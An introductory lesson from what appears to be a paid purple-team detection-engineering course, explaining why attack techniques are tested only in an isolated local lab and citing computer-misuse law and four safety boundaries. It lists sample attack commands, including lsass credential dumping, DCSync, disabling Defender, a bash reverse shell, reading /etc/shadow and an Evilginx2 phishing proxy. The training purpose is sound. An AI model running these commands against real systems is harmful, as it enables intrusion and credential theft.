In this module
PT1.1 Why a Local Lab — and Why Not Your Work Environment
You've worked in environments where testing is restricted. You've probably wanted to run a detection test against a production alert and been told no — or done it quietly and hoped nothing broke. This sub makes the case for why a local lab is the only safe way to validate detections, and what the alternatives get wrong.
What the course asks you to run
This is a sample of the commands you'll execute across Modules 2–14. Read them and consider where you'd be comfortable running them:
# Module 7 — Credential dumping (T1003.001)
procdump.exe -ma lsass.exe C:\Windows\Temp\debug.dmp
# Module 7 — DCSync (T1003.003)
secretsdump.py NORTHGATE/admin@192.0.2.10 -just-dc-ntlm
# Module 5 — UAC bypass (T1548.002)
Invoke-AtomicTest T1548.002 -TestNumbers 1
# Module 6 — Disable Windows Defender (T1562.001)
Set-MpPreference -DisableRealtimeMonitoring $true
# Module 13 — Ransomware simulation (T1486)
# Encrypts files in a target directory with a test key# Module 3 — Reverse shell (T1059.004)
bash -i >& /dev/tcp/192.0.2.50/4444 0>&1
# Module 5 — Sudo abuse (T1548.003)
sudo -u root /bin/bash
# Module 7 — Shadow file access (T1003.008)
cat /etc/shadow# Module 14 — AiTM phishing proxy (capstone)
# Evilginx2 capturing session cookies through MFA
evilginx2 -p ./phishlets -debugEvery one of these is a real attacker technique. Every one produces real telemetry. Every one would trigger real alerts in a production SIEM — if the detection rules work. And every one is illegal to run against systems you don't own.
The legal boundary
The laws are unambiguous:
UK — Computer Misuse Act 1990. Unauthorized access to computer material is a criminal offence (Section 1). Unauthorized modification of computer material — which includes dumping credentials, disabling security tools, and encrypting files — is a separate offence (Section 3). Maximum penalty: 10 years imprisonment. Authorization means explicit written permission from the system owner. Your employer's general IT security role does not constitute authorization to run offensive techniques against production systems.
US — Computer Fraud and Abuse Act (CFAA). Accessing a computer without authorization or exceeding authorized access is a federal crime (18 U.S.C. § 1030). The definition of "exceeding authorized access" has been interpreted broadly. Running procdump -ma lsass.exe on a domain controller you administer for IT purposes may exceed your authorized access if your authorization doesn't explicitly include offensive security testing.
Your employer's environment. Even with explicit authorization from your employer, running attack techniques in production carries risks that a lab doesn't. A credential dump in production captures real credentials. A ransomware simulation in production risks real data loss if the kill switch fails. A reverse shell in production creates a real backdoor. The lab eliminates all of these risks because nothing in the lab is real — the credentials are test credentials, the data is test data, the systems are disposable VMs.
What a local lab gives you
Safety. The lab is isolated. Attack traffic stays inside the lab network. Credentials are test credentials. VMs are disposable — if you break one, rebuild it. Nothing in the lab connects to production systems, real user data, or business-critical services.
Repeatability. You can run the same technique ten times to study the telemetry variations. You can snapshot a VM before an attack and revert after. You can tear down the entire lab and rebuild it from scratch to test a different configuration. Production doesn't give you any of this.
Full telemetry access. In the lab, you own the SIEM. You can see every event, modify every rule, tune every threshold. In production, you may not have write access to Sentinel analytics rules. In the lab, you control the entire pipeline from Sysmon configuration to SIEM query.
Parallel SIEM comparison. The lab runs three SIEMs simultaneously. You fire one technique and check detection in Sentinel, Defender XDR, and Splunk/Elastic. In production, you typically have one SIEM with one set of rules. The lab lets you compare detection across platforms — which is half the course's value.
Permanent ownership. The lab is yours after the course. Use it for ongoing purple-team work, team training, detection rule development, or proof-of-concept testing. Production access may change when you change roles. The lab doesn't.
What about cloud-hosted labs?
If your workstation can't run VMs locally, cloud-hosted VMs work. Rent Windows and Linux VMs in Azure, AWS, or any cloud provider. The lab build instructions in PT1.2–PT1.6 transfer — you're running the same software, just on remote hardware.
The trade-off: cloud VMs cost money beyond the Sentinel subscription (typically £40–80/month for the compute), and network configuration is more complex (you need to ensure attack traffic stays inside your cloud network, not routed through the public internet). The course doesn't walk the cloud path explicitly, but the principles are identical.
The four boundaries
Every Try-it in the course includes a safety callout with four boundaries. Here's what they mean:
Lab boundary. Run techniques only in your own lab. Not at work. Not on a friend's machine. Not on a cloud instance you share with others. Your lab, your VMs, your responsibility.
Dev tenant boundary. M365 attacks run only in your developer tenant — the one you sign up for in PT1.7. Not your work tenant. Not a client's tenant. Not a tenant someone gave you admin access to for a different purpose. The dev tenant is explicitly built for this kind of testing.
Network boundary. Lab traffic stays inside the lab. C2 callbacks go to your local Caldera instance, not to public IPs. If you're using cloud VMs, firewall rules prevent egress to the wider internet on attack ports. No lab traffic should ever leave your controlled network.
Data boundary. Telemetry from the lab lives in your own SIEM instance. Don't paste raw telemetry containing machine names or user names into public channels — Discord, GitHub issues, social media. Even dev-tenant data. Keep the operational hygiene clean from day one, because the habit transfers to production work.
These four boundaries appear in every technique sub. By Module 3 you'll skim them. That's fine — the point is the boundary stays visible, not that you re-read it word for word every time.
What comes next
PT1.2 starts the build. You'll pick a hypervisor, download the VM images, and create the first virtual machine. By the end of PT1.6 you'll have all four target environments running. PT1.7–PT1.11 configure the cloud services and SIEMs. PT1.12 fires the first technique and confirms everything works end to end.
The lab build is the longest free module in the course. Take it one sub at a time. Each sub ends with a verification step — if the verification passes, you're ready for the next sub.
You've built the lab and understand the validation gap.
Module 0 showed you why detection rules fail silently — vendor schema changes, attacker tool evolution, environment divergence, tuning drift. Module 1 gave you a working four-environment, three-SIEM purple-team lab. From here, you walk the kill chain technique by technique.
- 61 ATT&CK techniques across 12 tactic modules — Initial Access through Impact, each walked end-to-end with attack commands, annotated telemetry, and multi-SIEM detection rules
- Every detection in four formats — Sigma rule (canonical), Sentinel KQL, Defender XDR Advanced Hunting KQL, and Splunk SPL or Elastic. Tabbed side-by-side in every technique sub
- Module 14 Capstone — CHAIN-HARVEST — full purple-team exercise on an AiTM credential-phishing chain. Multi-stage attack, detection results across all three SIEMs, coverage gaps, tuning recommendations
- Programme template — coverage matrix, MTTD per technique, FP rates, detection quality scores, remediation backlog. Populated as you work, presentable to leadership by Module 14
- Public Sigma rule repo — every detection rule in a GitHub repository. Alumni contribute via PR. The artefacts outlive the course
Cancel anytime